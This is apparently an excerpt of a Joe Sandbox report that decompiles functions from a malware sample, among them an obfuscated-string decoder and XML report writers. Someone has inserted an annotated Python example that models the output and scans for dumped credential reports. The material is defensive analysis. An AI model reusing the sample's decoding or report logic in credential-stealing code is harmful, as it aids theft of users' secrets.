• String ID: SHAutoComplete$shlwapi.dll
• API String ID: 145871493-1506664499
• Opcode ID: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
• Instruction ID: e435a3077eadc7ffcc94e3fda903fcc6a6103b68d0c251917c13f6f883115a60
• Opcode Fuzzy Hash: 00be263e50752a8f479fbc1a88640afc62a4183cc8ad6fe6345b1c509fc360a9
• Instruction Fuzzy Hash: 70D0C2323002106B96605B326C0CAEB2D55EBC47527048032F505E1250EB648A86C1A8
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 87%
E00407406(char* __eax, intOrPtr* _a4, char _a8) {
    signed int _v8;
    int _v12;
    char* _v16;
    char _v20;
    signed int* _v24;
    char _v28;
    void _v284;
    char _v540;
    char _v1068;
    void _v3115;
    char _v3116;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t35;
    signed int _t36;
    signed int _t40;
    signed int* _t61;
    char _t69;
    char* _t74;
    char* _t75;
    intOrPtr* _t76;
    signed int _t78;
    int _t80;
    void* _t83;
    void* _t84;
    signed int _t89;

    _t74 = __eax;
    _t35 = strlen(__eax);
    _t78 = _t35;
    _t36 = _t35 & 0x80000001;
    if(_t36 < 0) {
        _t36 = (_t36 - 0x00000001 | 0xfffffffe) + 1;
        _t89 = _t36;
    }
    // reject inputs whose length is not even or is <= 0x20 bytes
    if(_t89 != 0 || _t78 <= 0x20) {
        return _t36;
    } else {
        _v3116 = 0;
        memset( &_v3115, 0, 0x7ff);
        _v8 = _v8 & 0x00000000;
        _t61 = _a4 + 4;
        _t40 =  *_t61 | 0x00000001;
        if(_t78 <= 4) {
            L7:
            _t79 =  &_v1068;
            E004046D7( &_v1068);
            if(E004047A0( &_v1068, _t93) != 0) {
                _v20 = _v8;
                _v16 =  &_v3116;
                _v28 = 0x10;
                _v24 = _t61;
                if(E00404811(_t79,  &_v20,  &_v28,  &_v12) != 0) {
                    // copy at most 0xff bytes of the result into a local buffer
                    _t80 = _v12;
                    if(_t80 > 0xff) {
                        _t80 = 0xff;
                    }
                    _v540 = 0;
                    _v284 = 0;
                    memcpy( &_v284, _v8, _t80);
                    _t27 =  &_a8; // 0x407626
                    _t75 =  &_v540;
                     *((char*)(_t84 + _t80 - 0x118)) = 0;
                    E004060D0(0xff, _t75,  *_t27);
                    // hand the result to the callback stored at *_a4, then free the buffer
                     *((intOrPtr*)( *_a4))(_t75);
                    LocalFree(_v8);
                }
            }
            return E004047F1( &_v1068);
        }
        // decode the input string two characters at a time into a stack buffer,
        // using _t40 as a rolling key (multiplied by 0x10ff5 each step)
        _t76 = _t74 + 5;
        _t83 = (_t78 + 0xfffffffb >> 1) + 1;
        do {
            _t69 = ( *((intOrPtr*)(_t76 - 1)) - 0x00000001 << 0x00000004 |  *_t76 - 0x00000021) - _t40;
            _t40 = _t40 * 0x10ff5;
            _t76 = _t76 + 2;
            _v8 = _v8 + 1;
            _t83 = _t83 - 1;
            _t93 = _t83;
             *((char*)(_t84 + _v8 - 0xc28)) = _t69;
        } while (_t83 != 0);
        goto L7;
    }
}
APIs
Strings
Memory Dump Source
• Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_vbc.jbxd
Yara matches
Similarity
• API ID: FreeLocalmemcpymemsetstrlen
• String ID: &v@
• API String ID: 3110682361-3426253984
• Opcode ID: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
• Instruction ID: 0225f7a5d6cb17f6a7661d1d380ab710e59dbb599c3936da0c6da93344c8566d
• Opcode Fuzzy Hash: 9a1ef4ca1be38dacd8a40183f10fd2ba3c83eed1e3cc7d309a54d2d6fc5753ae
• Instruction Fuzzy Hash: B731F772D0411DABDB10DB68CC81BDEBBB8EF45318F1001B6E645B3281DA78AE858B95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 84%
E00409695(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
    void _v259;
    char _v260;
    signed int _t34;
    char* _t45;
    void* _t47;

    // emits an XML-like <item> block: one "<name>value</name>" line per entry
    E00405EFD(_a4, "<item>\r\n");
    _t34 = 0;
    if( *((intOrPtr*)(__edi + 0x20)) > 0) {
        do {
            _v260 = 0;
            memset( &_v259, 0, 0xfe);
            E0040F09D( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4),  *((intOrPtr*)(__edi + 0x4c))),  *((intOrPtr*)(__edi + 0x50)));
            _t45 =  &_v260;
            E00409018(_t45,  *((intOrPtr*)(( *( *((intOrPtr*)(__edi + 0x24)) + _t34 * 4) << 4) +  *((intOrPtr*)(__edi + 0x34)) + 0xc)));
            sprintf( *(__edi + 0x54), "<%s>%s</%s>\r\n", _t45,  *((intOrPtr*)(__edi + 0x50)), _t45);
            E00405EFD(_a4,  *(__edi + 0x54));
            _t47 = _t47 + 0x28;
            _t34 = _t34 + 1;
        } while (_t34 <  *((intOrPtr*)(__edi + 0x20)));
    }
    return E00405EFD(_a4, "</item>\r\n");
}

                                                                                                                                                     Instruction addresses
                                                                                                                                                     • 0x004096a7, 0x004096ac, 0x004096b3, 0x004096b6, 0x004096c4, 0x004096cb, 0x004096e7, 0x004096f6, 0x004096fc, 0x00409710, 0x0040971b, 0x00409720, 0x00409723, 0x00409724, 0x00409729, 0x0040973b

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                    • memset.MSVCRT ref: 004096CB
                                                                                                                                                      • Part of subcall function 0040F09D: memcpy.MSVCRT ref: 0040F10B
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 00409710
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite_strlwrmemcpymemsetsprintfstrcpystrlen
                                                                                                                                                    • String ID: <%s>%s</%s>$</item>$<item>
                                                                                                                                                    • API String ID: 3200591283-2769808009
                                                                                                                                                    • Opcode ID: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                                                                    • Instruction ID: f0c093cdac9801847eaa7418f237768de61d650e358e632480a4b045718b8cde
                                                                                                                                                    • Opcode Fuzzy Hash: 07c18c0e4a87831351b3b02fe01daf5ffa13d64f31dc98592b1a2e626d7dc146
                                                                                                                                                    • Instruction Fuzzy Hash: FE11E731500515BFC711AF25CC42E967B64FF04318F10006AF549369A2EB76BA64DFD8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00407BF9(void* __esi, struct HWND__* _a4, signed int _a8) {
                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                    				struct tagPOINT _v20;
                                                                                                                                                    				struct tagRECT _v36;
                                                                                                                                                    				int _t27;
                                                                                                                                                    				struct HWND__* _t30;
                                                                                                                                                    				struct HWND__* _t32;
                                                                                                                                                    
                                                                                                                                                    				_t30 = _a4;
                                                                                                                                                    				if((_a8 & 0x00000001) != 0) {
                                                                                                                                                    					_t32 = GetParent(_t30);
                                                                                                                                                    					GetWindowRect(_t30,  &_v20);
                                                                                                                                                    					GetClientRect(_t32,  &_v36);
                                                                                                                                                    					MapWindowPoints(0, _t32,  &_v20, 2);
                                                                                                                                                    					_t27 = _v36.right - _v12 - _v36.left;
                                                                                                                                                    					_v20.x = _t27;
                                                                                                                                                    					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
                                                                                                                                                    				}
                                                                                                                                                    				if((_a8 & 0x00000002) != 0) {
                                                                                                                                                    					E00406560(_t30);
                                                                                                                                                    				}
                                                                                                                                                    				return 1;
                                                                                                                                                    			}

                                                                                                                                                     Instruction addresses
                                                                                                                                                     • 0x00407c04, 0x00407c07, 0x00407c11, 0x00407c18, 0x00407c23, 0x00407c33, 0x00407c41, 0x00407c49, 0x00407c4f, 0x00407c55, 0x00407c5a, 0x00407c5d, 0x00407c62, 0x00407c68

                                                                                                                                                    APIs
                                                                                                                                                    • GetParent.USER32(?), ref: 00407C0B
                                                                                                                                                    • GetWindowRect.USER32 ref: 00407C18
                                                                                                                                                    • GetClientRect.USER32 ref: 00407C23
                                                                                                                                                    • MapWindowPoints.USER32 ref: 00407C33
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00407C4F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4247780290-0
                                                                                                                                                    • Opcode ID: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                                                                    • Instruction ID: 06ac4e87c023cdd11bbb76a881eefb098f7857fbb12a9e12d40a619b69e20d01
                                                                                                                                                    • Opcode Fuzzy Hash: 7bea04c1b6e52cb4f5c6b6cbc8acbaaab4948e977a1f04226da639ece1b7c51f
                                                                                                                                                    • Instruction Fuzzy Hash: A7014C32800129BBDB119BA5DD89EFF7FBCEF46750F048129F901E2150D7B89541CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040A4C8(void* __eax) {
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				void* _t16;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    				void* _t38;
                                                                                                                                                    				void* _t41;
                                                                                                                                                    
                                                                                                                                                    				_t41 = __eax;
                                                                                                                                                    				_t16 = E00401033();
                                                                                                                                                    				if(_t16 == 0x5cb8) {
                                                                                                                                                    					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 0, 0);
                                                                                                                                                    					E00405E2C();
                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)) + 0x28)) = 0;
                                                                                                                                                    					SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0x1009, 0, 0);
                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x5c))(_t38, _t33);
                                                                                                                                                    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t41 + 0x370)))) + 0x74))(1);
                                                                                                                                                    					E0040A437(_t41);
                                                                                                                                                    					SetCursor( *0x416b98);
                                                                                                                                                    					SetFocus( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184));
                                                                                                                                                    					return SendMessageA( *( *((intOrPtr*)(_t41 + 0x370)) + 0x184), 0xb, 1, 0);
                                                                                                                                                    				}
                                                                                                                                                    				return _t16;
                                                                                                                                                    			}

                                                                                                                                                     Instruction addresses
                                                                                                                                                     • 0x0040a4c9, 0x0040a4cb, 0x0040a4d5, 0x0040a4f5, 0x0040a4f7, 0x0040a504, 0x0040a518, 0x0040a522, 0x0040a52f, 0x0040a532, 0x0040a53d, 0x0040a54f, 0x00000000, 0x0040a569, 0x0040a56b

                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A4F5
                                                                                                                                                      • Part of subcall function 00405E2C: LoadCursorA.USER32 ref: 00405E33
                                                                                                                                                      • Part of subcall function 00405E2C: SetCursor.USER32(00000000,?,0040BAC6), ref: 00405E3A
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A518
                                                                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A45D
                                                                                                                                                      • Part of subcall function 0040A437: sprintf.MSVCRT ref: 0040A487
                                                                                                                                                      • Part of subcall function 0040A437: strcat.MSVCRT(?,?,?,00000000,00000000), ref: 0040A49A
                                                                                                                                                      • Part of subcall function 0040A437: SendMessageA.USER32 ref: 0040A4C0
                                                                                                                                                    • SetCursor.USER32(?,?,0040B6B6), ref: 0040A53D
                                                                                                                                                    • SetFocus.USER32(?,?,?,0040B6B6), ref: 0040A54F
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A566
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                     • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Cursor$sprintf$FocusLoadstrcat
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2210206837-0
                                                                                                                                                    • Opcode ID: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                                                                    • Instruction ID: 5ceab2a0550c6f7be61398745e2f8fe4621b0361104972d0b8848fcf02267a2c
                                                                                                                                                    • Opcode Fuzzy Hash: d04c02dfd2683b57df494b0aa3d26c888530678e73924bd562102cacfecd4f7b
                                                                                                                                                    • Instruction Fuzzy Hash: 12116DB1200600EFD722AB74DC85FAA77EDFF48344F0644B9F1599B2B1CA716D018B10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
			E00409867(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				char* _t28;

				_t26 = __ecx;
				/* two 0xff-byte stack buffers, zeroed: one for the lower-cased name, one for the formatted tag */
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				/* E00405EFD is strlen + WriteFile (see APIs below): write the XML prolog to the output handle */
				E00405EFD(_a4, "<?xml version=\"1.0\"  encoding=\"ISO-8859-1\" ?>\r\n");
				/* virtual call through the object's vtable (slot 0x20) returns the name string */
				_t17 =  *((intOrPtr*)( *_t26 + 0x20))();
				_t28 =  &_v260;
				/* E00409018 is strcpy + _strlwr: copy the name into _v260 and lower-case it */
				E00409018(_t28, _t17);
				/* format "<name>\r\n" into the second buffer and write it as the root element */
				sprintf( &_v516, "<%s>\r\n", _t28);
				return E00405EFD(_a4,  &_v516);
			}
Instruction addresses: 0x00409881 0x00409883 0x0040988a 0x00409899 0x004098a0 0x004098ad 0x004098b9 0x004098bd 0x004098c3 0x004098d7 0x004098f1

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040988A
                                                                                                                                                    • memset.MSVCRT ref: 004098A0
                                                                                                                                                      • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                                                                                                      • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,75144DE0,00000000,?,?,004092ED,00000001,00412B1C,75144DE0), ref: 00405F17
                                                                                                                                                      • Part of subcall function 00409018: strcpy.MSVCRT(00000000,?,00409701,?,?,?), ref: 0040901D
                                                                                                                                                      • Part of subcall function 00409018: _strlwr.MSVCRT ref: 00409060
                                                                                                                                                    • sprintf.MSVCRT ref: 004098D7
                                                                                                                                                    Strings
                                                                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 004098A5
                                                                                                                                                    • <%s>, xrefs: 004098D1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$FileWrite_strlwrsprintfstrcpystrlen
                                                                                                                                                    • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                    • API String ID: 3202206310-1998499579
                                                                                                                                                    • Opcode ID: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                                                                    • Instruction ID: 66925a684df18266fce8bb701fa3a75b356ea9bacad4fe0319972b489c667c97
                                                                                                                                                    • Opcode Fuzzy Hash: 51e994947d23847d28837b494a86f4ec5d5778f6c6bb559d4411b981ab6fcacc
                                                                                                                                                    • Instruction Fuzzy Hash: BC01A77290011976D721A759CC46FDA7B6C9F44304F0400FAB509B3192DB789F858BA8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

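The listing above for E00409867 shows a small report writer: it zeroes two 0xff-byte stack buffers, writes an XML prolog, fetches a name through a virtual call, copies and lower-cases it (E00409018 is strcpy followed by _strlwr), formats "<name>\r\n" with sprintf and writes that as the root element. The following is an added example, not code from the report or from the sample: a Python model of what that function emits, and a scanner that recognises the resulting header in a file, which is the on-disk artifact an analyst would look for. The name "ExampleApp", the sample inputs and the regular expression are constructed for the example; the real name comes from vtable slot 0x20, whose target is not visible in the listing. The decompiled literal shows two spaces between version and encoding while the Strings summary shows one, so the scanner accepts any run of whitespace there.

```python
"""
Added example, not part of the Joe Sandbox report and not the sample's own code:
a model of the output of the decompiled E00409867 plus a scanner for that output.
Sample inputs below are constructed.
"""
import re
from typing import Optional

# E00409867 zeroes two buffers of 0xff bytes each (one char plus memset of 0xfe),
# then fills them with strcpy and sprintf, which do not bound their writes.
# This model refuses input that would not fit instead of modelling an overrun.
BUF_LEN = 0xFF

# Prolog exactly as it appears in the decompiled literal (two spaces before "encoding").
XML_HEADER = '<?xml version="1.0"  encoding="ISO-8859-1" ?>\r\n'


def open_report(app_name: str) -> bytes:
    """Return the bytes E00409867 writes: the XML prolog, then '<name>\\r\\n'.

    The name is lower-cased because E00409018 is strcpy followed by _strlwr.
    `app_name` stands in for the string the virtual call (slot 0x20) returns;
    that source is an assumption of this example.
    """
    name = app_name.lower()                      # strcpy + _strlwr into the first buffer
    root = "<%s>\r\n" % name                     # sprintf into the second buffer
    if len(name) + 1 > BUF_LEN or len(root) + 1 > BUF_LEN:
        raise ValueError("name does not fit the function's fixed 0xff-byte buffers")
    return (XML_HEADER + root).encode("latin-1")  # ISO-8859-1, as the prolog declares


# Constructed pattern for the scanner: prolog with any whitespace run before
# "encoding", CRLF, then a single root element on its own CRLF-terminated line.
HEADER_RE = re.compile(
    rb'^<\?xml version="1\.0"\s+encoding="ISO-8859-1" \?>\r\n<([^<>\r\n]+)>\r\n'
)


def report_root(data: bytes) -> Optional[str]:
    """Return the root element name if `data` begins like an E00409867 report, else None."""
    m = HEADER_RE.match(data)
    return m.group(1).decode("latin-1") if m else None


if __name__ == "__main__":
    sample = open_report("ExampleApp")           # constructed name
    print(sample)
    print(report_root(sample))                   # exampleapp
    print(report_root(b"<html></html>"))         # None
```

When hunting for dumped credential reports, run `report_root` over the first few hundred bytes of candidate files rather than the whole file; the header is all this function writes, and the element name it returns is the lower-cased name the writer was given.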
                                                                                                                                                    C-Code - Quality: 76%
			E00408572(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				/* member cleanup: L004115D6 is operator delete (API ID ??3@ below);
				   each heap-owned field is released if non-NULL, then all four are zeroed */
				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x24));
				if(_t9 != 0) {
					_push(_t9);
					L004115D6();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x34));
				if(_t10 != 0) {
					_push(_t10);
					L004115D6();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x1b4));
				if(_t11 != 0) {
					_push(_t11);
					L004115D6();
				}
				/* +0x1a0 points to a heap block that itself holds a pointer:
				   release the inner block, clear it, then release the outer one */
				_t18 =  *((intOrPtr*)(_t19 + 0x1a0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L004115D6();
						 *_t18 = 0;
					}
					_push(_t18);
					L004115D6();
				}
				 *((intOrPtr*)(_t19 + 0x1a0)) = 0;
				 *((intOrPtr*)(_t19 + 0x24)) = 0;
				 *((intOrPtr*)(_t19 + 0x34)) = 0;
				 *((intOrPtr*)(_t19 + 0x1b4)) = 0;
				return _t11;
			}
Instruction addresses: 0x00408572 0x00408572 0x0040857b 0x0040857d 0x0040857e 0x00408583 0x00408584 0x00408589 0x0040858b 0x0040858c 0x00408591 0x00408592 0x0040859a 0x0040859c 0x0040859d 0x004085a2 0x004085a3 0x004085ab 0x004085ad 0x004085b1 0x004085b3 0x004085b4 0x004085ba 0x004085ba 0x004085bc 0x004085bd 0x004085c2 0x004085c4 0x004085ca 0x004085cd 0x004085d0 0x004085d7

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                    • Opcode ID: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                    • Instruction ID: 0a64c6e0650ef7a992325d71cca8afebdafc0e64b7e6075a64aa0ecb46f153ec
                                                                                                                                                    • Opcode Fuzzy Hash: adc8f632b908da7283220df0e2c160d15a0e9bb9cd04da95c42ed7d64d4f577a
                                                                                                                                                    • Instruction Fuzzy Hash: C2F0F4725057016FDB209F6A99C0497B7D6BB48714B64083FF18AD3741CF78AD818A18
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 70%
			E004085D8(intOrPtr* __edi) {
				void* __esi;
				void** _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				/* destructor-style teardown: install the vtable at 0x413320, let E00408572 release
				   the members it owns, then handle the four members at +0x10, +0xc, +8 and +4:
				   E00406B5B on each, followed by operator delete (L004115D6) */
				 *__edi = 0x413320;
				E00408572(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00406B5B(_t21);
					_push(_t21);
					L004115D6();
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00406B5B(_t22);
					_push(_t22);
					L004115D6();
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00406B5B(_t23);
					_push(_t23);
					L004115D6();
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00406B5B(_t24);
					_push(_t24);
					L004115D6();
				}
				/* finally call vtable slot 0 and free() what the returned pointer refers to;
				   the 70% quality score above means this tail may be reconstructed imprecisely */
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				free( *_t7);
				return _t7;
			}











                                                                                                                                                    0x004085d8
                                                                                                                                                    0x004085db
                                                                                                                                                    0x004085e1
                                                                                                                                                    0x004085e6
                                                                                                                                                    0x004085eb
                                                                                                                                                    0x004085ed
                                                                                                                                                    0x004085f2
                                                                                                                                                    0x004085f3
                                                                                                                                                    0x004085f8
                                                                                                                                                    0x004085f9
                                                                                                                                                    0x004085fe
                                                                                                                                                    0x00408600
                                                                                                                                                    0x00408605
                                                                                                                                                    0x00408606
                                                                                                                                                    0x0040860b
                                                                                                                                                    0x0040860c
                                                                                                                                                    0x00408611
                                                                                                                                                    0x00408613
                                                                                                                                                    0x00408618
                                                                                                                                                    0x00408619
                                                                                                                                                    0x0040861e
                                                                                                                                                    0x0040861f
                                                                                                                                                    0x00408624
                                                                                                                                                    0x00408626
                                                                                                                                                    0x0040862b
                                                                                                                                                    0x0040862c
                                                                                                                                                    0x00408631
                                                                                                                                                    0x00408632
                                                                                                                                                    0x0040863c
                                                                                                                                                    0x00408640
                                                                                                                                                    0x00408646

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040857E
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004085F3
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408606
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408619
                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040862C
                                                                                                                                                    • free.MSVCRT(00000000), ref: 00408640
                                                                                                                                                      • Part of subcall function 00406B5B: free.MSVCRT(00000000,00406DE2,00000000,?,?), ref: 00406B62
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ??3@$free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2241099983-0
                                                                                                                                                    • Opcode ID: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                                                                    • Instruction ID: 9ddd328a78e70669a2f2a4495a49ad6ad9a3331e0dda25fcf26d4743fc91c851
                                                                                                                                                    • Opcode Fuzzy Hash: 0216321c22edde0e428b6460b65a4d9d3fdf50d22b04996e8803d6d71622e83e
                                                                                                                                                    • Instruction Fuzzy Hash: E3F0F6729028306BC9213B275011A8EB3657D4171431B056FF946BB7A28F3C6E9246FD
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 19%
E0040E81A(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, intOrPtr _a12) {
	void* __esi;
	void* _t11;
	void* _t26;
	void* _t27;

	// _a4 is the window message, _a8 the wParam (an HDC for WM_CTLCOLOR* messages)
	// and _a12 the lParam (the control's HWND). 0x110 is WM_INITDIALOG.
	_t26 = __edx;
	_t11 = _a4 - 0x110;
	_t27 = __ecx;
	if(_t11 == 0) {
		E0040E4A4(__ecx, __ecx, __eflags);
		E00406491(_t26,  *((intOrPtr*)(__ecx + 4)));
		L5:
		return E004015AE(_t27, _a4, _a8, _a12);
	}
	// 0x110 + 0x28 == 0x138 == WM_CTLCOLORSTATIC. E004062D1 (see the APIs list below:
	// GetClassNameA + _stricmp against "edit") checks whether the control's window class
	// is "edit"; a read-only or disabled edit control also receives WM_CTLCOLORSTATIC.
	if(_t11 != 0x28 || E004062D1(_a12) == 0) {
		goto L5;
	} else {
		SetBkMode(_a8, 1);                   // 1 == TRANSPARENT
		SetBkColor(_a8, GetSysColor(5));     // 5 == COLOR_WINDOW
		SetTextColor(_a8, 0xc00000);         // COLORREF is 0x00BBGGRR, so this is dark blue text
		return GetSysColorBrush(5);          // brush the control background is painted with
	}
}

Instruction addresses: 0x0040e81a, 0x0040e820, 0x0040e826, 0x0040e828, 0x0040e871, 0x0040e879, 0x0040e87f, 0x00000000, 0x0040e88a, 0x0040e82d, 0x00000000, 0x0040e83c, 0x0040e841, 0x0040e853, 0x0040e861, 0x00000000, 0x0040e869

APIs
